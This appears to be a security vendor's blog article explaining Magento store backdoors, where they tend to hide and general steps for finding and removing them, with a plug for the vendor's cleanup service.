A backdoor is a way around the normal authentication method. It works in a similar way a Trojan works. When the security of the first step authentication is not easy to compromise, the attacker looks for the weak point on the website, which usually is its backdoor. After accessing a website through a backdoor, the attacker tries to embed some codes on the website which can, later on, be used as a way to access entry to the website with little or no effort.
On the other hand, hackers tend to plant a backdoor when they hack a website to have continual access to the website in question. In other cases, Magento store developers deliberately leave backdoors behind to have easier access to the system to troubleshoot bugs and other issues at a later stage. Whatever the case may be, backdoors are always a security risk. And it is always better to NOT have a backdoor in your system than having it.
Why are Magento backdoors a menace?
A backdoor can bring so way too many negative consequences for your Magento store if exploited.
Over the years we have seen Magento backdoor attacks transpire into the following for the e-commerce store:
- Unauthorized access to hackers
- Data theft and data breaches
- Website defacement
- Server hijacking
- Server-related attacks such as DoS and DDoS attacks
- Inject malware, shell
- Steal valuable data, and so on.
In some cases, backdoors replicate itself like a Trojan horse and eventually end up infecting the hardware.
The list of some common backdoors is easily available and I won’t be listing them here. This common PHP web shell and backdoor list as given by GitHub will serve your purpose if you’re looking for common Magento backdoors.
Why is it hard to detect a backdoor?
Backdoors are very hard to detect because they can disguise itself into something very useful which is very difficult to suspect. At least by an average store owner.
Here are some reasons why a backdoor is particularly hard to detect:
- An attacker can hide the backdoor anywhere on your website
- They are usually normal PHP code
- They reside in unconventional areas to further miss detection
Areas to look for a backdoor in your Magento store
If you have been suspecting the presence of a Magento backdoor in your e-commerce store, these are some of the places you should look at:
- Theme & Plugin files: If you have inactive themes lying around on your website, it is likely they may be your backdoor host. Since outdated and inactive themes and plugin files are most vulnerable, hackers creep through them to your website and keep these files as backdoors. Vulnerable themes and plugins are the number one vector that attracts hackers.
- Core files: After themes and plugins file the most sought after area is core files. More sophisticated hackers create and inject backdoors in the most crucial files on your website, i.e. the core files to defy detection.
- Configuration files: If we were to name the most probable area to have backdoors amongst the core files, it is this file – the configuration file. Hence, don’t forget to scan this file while hunting for backdoors.
- Database files: The database of an e-commerce store holds valuable user information hackers so desperately want. You may want to check here too.
After you have found the backdoor, the next wise step will be to do a complete scan to remove the backdoors from your website.
But, in case you couldn’t find the malware, (and let’s admit it, it’s not easy to locate a backdoor), get professionals to find and remove it for you. Astra Security’s immediate malware & backdoor removal service offers complete and quick recovery from malware & backdoor infections.
How to remove a Magento backdoor?
Removal of website backdoor should be the next thing on your mind after cleaning your website of the malware.
1. Comparing checksum
In this technique, the website after the hack is compared with the backup of the website before the hack. It detects the infected files on your hacked website. The checksum will help detect the malware and remove it from the website.
2. Scanning for unknown files
There are certain cases where a backdoor is so well placed and hidden, that it is almost impossible to detect it. So, manually check all the functions and files of your website, to see if anything is missing or something extra is embedded.
3. Block the bad codes
Block some of the infected websites in advance. It is better to be safe than sorry.
4. Core Files Integrity
Verify the integrity of the core files of your website. See if anything is modified or altered. If yes, then install a new copy of Magento.
How to prepare against a Magento backdoor hack?
You have successfully removed a backdoor from your website. But what to do to stop it from coming back? Here are certain tips and tricks for you:
- Reset all the passwords.
- Re-check your admin accounts.
- Use a secure firewall.
- Always keep a backup of your website.
- Regularly update your website.
- Use the latest versions of PHP.
- Use secure plugins.
- Limit the login attempts to your website.
Magento backdoor is a menace to your Magento store, but it can be found and eradicated. Most importantly there is no difference between good or bad backdoors, all backdoors pose a security threat and should be handled very carefully. If you’re struggling to find backdoors in your Magento store, follow the steps given in this guide to successfully find and remove them. Overall, having a security system and malware scanner, which scans your Magento store for malware & backdoors on regular intervals can be helpful.